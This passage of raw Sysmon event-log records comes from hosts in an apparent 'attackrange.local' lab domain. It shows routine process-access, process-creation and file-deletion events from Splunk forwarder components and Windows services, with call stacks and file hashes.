Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.248{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows 
(R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:53.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F1E077335D87BBE5E1FC899CBE62D7F,SHA256=C1173B81B1370B237464F605DBAEC24D4FF0AAE8F2ADE24430368BE53C79CA29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D30DC0BFCC6AE9FFC6E6ED7E840ED6C5,SHA256=73EE279D6DA8D1CEBABF89738FF9A2E8988D6A5F98754BE27FD04CDCF56F1C62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.780{466BC892-F72D-60EB-C07D-00000000CF01}88769760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.664{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB731F80BF7C221A6D878D876105C8F,SHA256=48AD2A687211F0713D214259C9269847564178C8ADC6EB3651F724E6531AE7CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.548{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:53.533{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.518{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.064{466BC892-F72C-60EB-BF7D-00000000CF01}55848044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.816{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1BC16143042E57D39B1FA663FAC80B7,SHA256=745519FB57C007BEBF1A503326ED01CBDEAAFEF946B60E97E5C7152990F523BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:54.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665BF8568797018AF3B42B143F9FF133,SHA256=807060B9D1BF0C0401502CDD3B6786A4E4ABDA59A41789F613FC0EC77BFCBC4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.198{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85875769EE3A3F900BBB463BA1F357CD,SHA256=844DFBB805C8979202D292F0C7581F9A88E235410B01E48D5C2326D354D186F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 